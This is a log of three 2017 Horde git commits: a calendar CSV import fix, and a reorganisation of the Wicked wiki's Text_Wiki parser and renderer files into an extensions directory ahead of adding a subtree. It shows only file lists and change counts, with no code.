-----------------------------------------------------------------------

commit 02c4dd5d92630bf43e96a26ff4dfd1d369f129a5
Author: Jan Schneider 
Date:   Thu Aug 31 18:14:18 2017 +0200

    [jan] Fix time offsets when importing CSV data with two-digit years.

 kronolith/package.xml | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/02c4dd5d92630bf43e96a26ff4dfd1d369f129a5

-----------------------------------------------------------------------

commit 12c00f82175a6c30b0bc5ccd08bc1585630cb2f8
Author: Jan Schneider 
Date:   Mon Sep 4 17:39:47 2017 +0200

    Prepare for adding a subtree.

 wicked/lib/Text_Wiki/Parse/BBCode/Attribute.php    |  52 -----
 wicked/lib/Text_Wiki/Parse/BBCode/Code2.php        |  10 -
 wicked/lib/Text_Wiki/Parse/BBCode/Image2.php       |  10 -
 wicked/lib/Text_Wiki/Parse/BBCode/Registrylink.php |  44 -----
 wicked/lib/Text_Wiki/Parse/BBCode/Wickedblock.php  |  45 -----
 wicked/lib/Text_Wiki/Parse/Cowiki/Attribute.php    |  52 -----
 wicked/lib/Text_Wiki/Parse/Cowiki/Code2.php        |  10 -
 wicked/lib/Text_Wiki/Parse/Cowiki/Freelink2.php    |  10 -
 wicked/lib/Text_Wiki/Parse/Cowiki/Heading2.php     |  15 --
 wicked/lib/Text_Wiki/Parse/Cowiki/Image2.php       |  10 -
 wicked/lib/Text_Wiki/Parse/Cowiki/Registrylink.php |  44 -----
 wicked/lib/Text_Wiki/Parse/Cowiki/Wickedblock.php  |  45 -----
 wicked/lib/Text_Wiki/Parse/Cowiki/Wikilink2.php    |  10 -
 wicked/lib/Text_Wiki/Parse/Creole/Attribute.php    |  52 -----
 wicked/lib/Text_Wiki/Parse/Creole/Heading2.php     |  12 --
 wicked/lib/Text_Wiki/Parse/Creole/Image2.php       |  10 -
 wicked/lib/Text_Wiki/Parse/Creole/Registrylink.php |  44 -----
 wicked/lib/Text_Wiki/Parse/Creole/Wickedblock.php  |  45 -----
 wicked/lib/Text_Wiki/Parse/Creole/Wikilink2.php    |  10 -
 wicked/lib/Text_Wiki/Parse/Default/Attribute.php   |  52 -----
 wicked/lib/Text_Wiki/Parse/Default/Code2.php       |  13 --
 wicked/lib/Text_Wiki/Parse/Default/Freelink2.php   |  60 ------
 wicked/lib/Text_Wiki/Parse/Default/Heading2.php    |  16 --
 wicked/lib/Text_Wiki/Parse/Default/Image2.php      |  10 -
 .../lib/Text_Wiki/Parse/Default/Registrylink.php   |  44 -----
 wicked/lib/Text_Wiki/Parse/Default/Table2.php      | 212 ---------------------
 wicked/lib/Text_Wiki/Parse/Default/Toc2.php        |  86 ---------
 wicked/lib/Text_Wiki/Parse/Default/Wickedblock.php |  45 -----
 wicked/lib/Text_Wiki/Parse/Default/Wikilink2.php   |  10 -
 wicked/lib/Text_Wiki/Parse/Mediawiki/Attribute.php |  52 -----
 wicked/lib/Text_Wiki/Parse/Mediawiki/Code2.php     |  10 -
 wicked/lib/Text_Wiki/Parse/Mediawiki/Heading2.php  |  12 --
 wicked/lib/Text_Wiki/Parse/Mediawiki/Image2.php    |  10 -
 .../lib/Text_Wiki/Parse/Mediawiki/Registrylink.php |  44 -----
 .../lib/Text_Wiki/Parse/Mediawiki/Wickedblock.php  |  45 -----
 wicked/lib/Text_Wiki/Parse/Mediawiki/Wikilink2.php |  63 ------
 wicked/lib/Text_Wiki/Parse/Tiki/Attribute.php      |  52 -----
 wicked/lib/Text_Wiki/Parse/Tiki/Code2.php          |  10 -
 wicked/lib/Text_Wiki/Parse/Tiki/Freelink2.php      |  10 -
 wicked/lib/Text_Wiki/Parse/Tiki/Heading2.php       |  12 --
 wicked/lib/Text_Wiki/Parse/Tiki/Image2.php         |  10 -
 wicked/lib/Text_Wiki/Parse/Tiki/Registrylink.php   |  44 -----
 wicked/lib/Text_Wiki/Parse/Tiki/Wickedblock.php    |  45 -----
 wicked/lib/Text_Wiki/Parse/Tiki/Wikilink2.php      |  10 -
 wicked/lib/Text_Wiki/Render/Latex/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Latex/Toc2.php         |   7 -
 wicked/lib/Text_Wiki/Render/Plain/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Plain/Table2.php       |  26 ---
 wicked/lib/Text_Wiki/Render/Plain/Toc2.php         |   7 -
 wicked/lib/Text_Wiki/Render/Rst.php                |  39 ----
 wicked/lib/Text_Wiki/Render/Rst/Anchor.php         |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Blockquote.php     |  70 -------
 wicked/lib/Text_Wiki/Render/Rst/Bold.php           |  44 -----
 wicked/lib/Text_Wiki/Render/Rst/Center.php         |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Code.php           |  43 -----
 wicked/lib/Text_Wiki/Render/Rst/Colortext.php      |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Deflist.php        |  87 ---------
 wicked/lib/Text_Wiki/Render/Rst/Emphasis.php       |  44 -----
 wicked/lib/Text_Wiki/Render/Rst/Freelink2.php      |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Heading2.php       | 101 ----------
 wicked/lib/Text_Wiki/Render/Rst/Horiz.php          |  39 ----
 wicked/lib/Text_Wiki/Render/Rst/Interwiki.php      |  66 -------
 wicked/lib/Text_Wiki/Render/Rst/Italic.php         |  27 ---
 wicked/lib/Text_Wiki/Render/Rst/Links.php          |  49 -----
 wicked/lib/Text_Wiki/Render/Rst/List.php           |  71 -------
 wicked/lib/Text_Wiki/Render/Rst/Newline.php        |  43 -----
 wicked/lib/Text_Wiki/Render/Rst/Paragraph.php      |  51 -----
 wicked/lib/Text_Wiki/Render/Rst/Phplookup.php      |  58 ------
 wicked/lib/Text_Wiki/Render/Rst/Raw.php            |  43 -----
 wicked/lib/Text_Wiki/Render/Rst/Revise.php         |  46 -----
 wicked/lib/Text_Wiki/Render/Rst/Strong.php         |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Subscript.php      |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Superscript.php    |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Table2.php         | 157 ---------------
 wicked/lib/Text_Wiki/Render/Rst/Toc2.php           |  57 ------
 wicked/lib/Text_Wiki/Render/Rst/Tt.php             |  43 -----
 wicked/lib/Text_Wiki/Render/Rst/Underline.php      |  26 ---
 wicked/lib/Text_Wiki/Render/Rst/Url.php            |  53 ------
 wicked/lib/Text_Wiki/Render/Rst/Wikilink.php       | 127 ------------
 wicked/lib/Text_Wiki/Render/Xhtml/Attribute.php    |  53 ------
 wicked/lib/Text_Wiki/Render/Xhtml/Code2.php        |  28 ---
 wicked/lib/Text_Wiki/Render/Xhtml/Freelink2.php    |   5 -
 wicked/lib/Text_Wiki/Render/Xhtml/Heading2.php     |   7 -
 wicked/lib/Text_Wiki/Render/Xhtml/Image2.php       | 157 ---------------
 wicked/lib/Text_Wiki/Render/Xhtml/Interwiki.php    |  56 ------
 wicked/lib/Text_Wiki/Render/Xhtml/Registrylink.php |  29 ---
 wicked/lib/Text_Wiki/Render/Xhtml/Toc2.php         |  92 ---------
 wicked/lib/Text_Wiki/Render/Xhtml/Url.php          |  47 -----
 wicked/lib/Text_Wiki/Render/Xhtml/Wickedblock.php  |  33 ----
 wicked/lib/Text_Wiki/Render/Xhtml/Wikilink2.php    | 110 -----------
 .../Parse/BBCode/Attribute.php                     |  52 +++++
 .../Text_Wiki_Extensions/Parse/BBCode/Code2.php    |  10 +
 .../Text_Wiki_Extensions/Parse/BBCode/Image2.php   |  10 +
 .../Parse/BBCode/Registrylink.php                  |  44 +++++
 .../Parse/BBCode/Wickedblock.php                   |  45 +++++
 .../Parse/Cowiki/Attribute.php                     |  52 +++++
 .../Text_Wiki_Extensions/Parse/Cowiki/Code2.php    |  10 +
 .../Parse/Cowiki/Freelink2.php                     |  10 +
 .../Text_Wiki_Extensions/Parse/Cowiki/Heading2.php |  15 ++
 .../Text_Wiki_Extensions/Parse/Cowiki/Image2.php   |  10 +
 .../Parse/Cowiki/Registrylink.php                  |  44 +++++
 .../Parse/Cowiki/Wickedblock.php                   |  45 +++++
 .../Parse/Cowiki/Wikilink2.php                     |  10 +
 .../Parse/Creole/Attribute.php                     |  52 +++++
 .../Text_Wiki_Extensions/Parse/Creole/Heading2.php |  12 ++
 .../Text_Wiki_Extensions/Parse/Creole/Image2.php   |  10 +
 .../Parse/Creole/Registrylink.php                  |  44 +++++
 .../Parse/Creole/Wickedblock.php                   |  45 +++++
 .../Parse/Creole/Wikilink2.php                     |  10 +
 .../Parse/Default/Attribute.php                    |  52 +++++
 .../Text_Wiki_Extensions/Parse/Default/Code2.php   |  13 ++
 .../Parse/Default/Freelink2.php                    |  60 ++++++
 .../Parse/Default/Heading2.php                     |  16 ++
 .../Text_Wiki_Extensions/Parse/Default/Image2.php  |  10 +
 .../Parse/Default/Registrylink.php                 |  44 +++++
 .../Text_Wiki_Extensions/Parse/Default/Table2.php  | 212 +++++++++++++++++++++
 .../Text_Wiki_Extensions/Parse/Default/Toc2.php    |  86 +++++++++
 .../Parse/Default/Wickedblock.php                  |  45 +++++
 .../Parse/Default/Wikilink2.php                    |  10 +
 .../Parse/Mediawiki/Attribute.php                  |  52 +++++
 .../Text_Wiki_Extensions/Parse/Mediawiki/Code2.php |  10 +
 .../Parse/Mediawiki/Heading2.php                   |  12 ++
 .../Parse/Mediawiki/Image2.php                     |  10 +
 .../Parse/Mediawiki/Registrylink.php               |  44 +++++
 .../Parse/Mediawiki/Wickedblock.php                |  45 +++++
 .../Parse/Mediawiki/Wikilink2.php                  |  63 ++++++
 .../Text_Wiki_Extensions/Parse/Tiki/Attribute.php  |  52 +++++
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php  |  10 +
 .../Text_Wiki_Extensions/Parse/Tiki/Freelink2.php  |  10 +
 .../Text_Wiki_Extensions/Parse/Tiki/Heading2.php   |  12 ++
 .../lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php |  10 +
 .../Parse/Tiki/Registrylink.php                    |  44 +++++
 .../Parse/Tiki/Wickedblock.php                     |  45 +++++
 .../Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php  |  10 +
 .../Text_Wiki_Extensions/Render/Latex/Heading2.php |   7 +
 .../lib/Text_Wiki_Extensions/Render/Latex/Toc2.php |   7 +
 .../Text_Wiki_Extensions/Render/Plain/Heading2.php |   7 +
 .../Text_Wiki_Extensions/Render/Plain/Table2.php   |  26 +++
 .../lib/Text_Wiki_Extensions/Render/Plain/Toc2.php |   7 +
 wicked/lib/Text_Wiki_Extensions/Render/Rst.php     |  39 ++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Anchor.php |  26 +++
 .../Text_Wiki_Extensions/Render/Rst/Blockquote.php |  70 +++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Bold.php   |  44 +++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Center.php |  26 +++
 .../lib/Text_Wiki_Extensions/Render/Rst/Code.php   |  43 +++++
 .../Text_Wiki_Extensions/Render/Rst/Colortext.php  |  26 +++
 .../Text_Wiki_Extensions/Render/Rst/Deflist.php    |  87 +++++++++
 .../Text_Wiki_Extensions/Render/Rst/Emphasis.php   |  44 +++++
 .../Text_Wiki_Extensions/Render/Rst/Freelink2.php  |  26 +++
 .../Text_Wiki_Extensions/Render/Rst/Heading2.php   | 101 ++++++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Horiz.php  |  39 ++++
 .../Text_Wiki_Extensions/Render/Rst/Interwiki.php  |  66 +++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Italic.php |  27 +++
 .../lib/Text_Wiki_Extensions/Render/Rst/Links.php  |  49 +++++
 .../lib/Text_Wiki_Extensions/Render/Rst/List.php   |  71 +++++++
 .../Text_Wiki_Extensions/Render/Rst/Newline.php    |  43 +++++
 .../Text_Wiki_Extensions/Render/Rst/Paragraph.php  |  51 +++++
 .../Text_Wiki_Extensions/Render/Rst/Phplookup.php  |  58 ++++++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php |  43 +++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Revise.php |  46 +++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Strong.php |  26 +++
 .../Text_Wiki_Extensions/Render/Rst/Subscript.php  |  26 +++
 .../Render/Rst/Superscript.php                     |  26 +++
 .../lib/Text_Wiki_Extensions/Render/Rst/Table2.php | 157 +++++++++++++++
 .../lib/Text_Wiki_Extensions/Render/Rst/Toc2.php   |  57 ++++++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php  |  43 +++++
 .../Text_Wiki_Extensions/Render/Rst/Underline.php  |  26 +++
 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php |  53 ++++++
 .../Text_Wiki_Extensions/Render/Rst/Wikilink.php   | 127 ++++++++++++
 .../Render/Xhtml/Attribute.php                     |  53 ++++++
 .../Text_Wiki_Extensions/Render/Xhtml/Code2.php    |  28 +++
 .../Render/Xhtml/Freelink2.php                     |   5 +
 .../Text_Wiki_Extensions/Render/Xhtml/Heading2.php |   7 +
 .../Text_Wiki_Extensions/Render/Xhtml/Image2.php   | 157 +++++++++++++++
 .../Render/Xhtml/Interwiki.php                     |  56 ++++++
 .../Render/Xhtml/Registrylink.php                  |  29 +++
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php |  92 +++++++++
 .../lib/Text_Wiki_Extensions/Render/Xhtml/Url.php  |  47 +++++
 .../Render/Xhtml/Wickedblock.php                   |  33 ++++
 .../Render/Xhtml/Wikilink2.php                     | 110 +++++++++++
 180 files changed, 3744 insertions(+), 3744 deletions(-)
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/BBCode/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Cowiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Creole/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Default/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Mediawiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Parse/Tiki/Wikilink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Latex/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Latex/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Plain/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Plain/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Plain/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Anchor.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Blockquote.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Bold.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Center.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Code.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Colortext.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Deflist.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Emphasis.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Horiz.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Italic.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Links.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/List.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Newline.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Paragraph.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Phplookup.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Raw.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Revise.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Strong.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Subscript.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Superscript.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Table2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Tt.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Underline.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Url.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Rst/Wikilink.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Attribute.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Code2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Freelink2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Heading2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Image2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Interwiki.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Registrylink.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Toc2.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Url.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Wickedblock.php
 delete mode 100644 wicked/lib/Text_Wiki/Render/Xhtml/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/BBCode/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Cowiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Creole/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Table2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Default/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Mediawiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Parse/Tiki/Wikilink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Latex/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Table2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Plain/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Anchor.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Blockquote.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Bold.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Center.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Code.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Colortext.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Deflist.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Emphasis.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Horiz.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Interwiki.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Italic.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Links.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/List.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Newline.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Paragraph.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Phplookup.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Raw.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Revise.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Strong.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Subscript.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Superscript.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Table2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Tt.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Underline.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Url.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Rst/Wikilink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Attribute.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Code2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Freelink2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Heading2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Image2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Interwiki.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Registrylink.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Toc2.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Url.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wickedblock.php
 create mode 100644 wicked/lib/Text_Wiki_Extensions/Render/Xhtml/Wikilink2.php

http://github.com/horde/horde/commit/12c00f82175a6c30b0bc5ccd08bc1585630cb2f8

-----------------------------------------------------------------------

commit 9460590060bdc10d6e7f02ca44b2dc586e236504
Author: Jan Schneider 
Date:   Mon Sep 4 17:41:31 2017 +0200

    Squashed 'wicked/lib/Text_Wiki/' content from commit 301610e
    
    git-subtree-dir: wicked/lib/Text_Wiki
    git-subtree-split: 301610e98ebc566fdfa502c74fe2e9f05fe8c369

 .gitignore                                         |    4 +
 .travis.yml                                        |    7 +
 Text/Wiki.php                                      | 1559 ++++++++++++++++++++
 Text/Wiki/BBCode.php                               |  100 ++
 Text/Wiki/Cowiki.php                               |   43 +
 Text/Wiki/Creole.php                               |  150 ++
 Text/Wiki/Default.php                              |   27 +
 Text/Wiki/Doku.php                                 |   43 +
 Text/Wiki/Mediawiki.php                            |   95 ++
 Text/Wiki/Parse.php                                |  280 ++++
 Text/Wiki/Parse/BBCode/Blockquote.php              |   91 ++
 Text/Wiki/Parse/BBCode/Bold.php                    |   63 +
 Text/Wiki/Parse/BBCode/Code.php                    |   63 +
 Text/Wiki/Parse/BBCode/Colortext.php               |   92 ++
 Text/Wiki/Parse/BBCode/Font.php                    |   87 ++
 Text/Wiki/Parse/BBCode/Image.php                   |  102 ++
 Text/Wiki/Parse/BBCode/Italic.php                  |   62 +
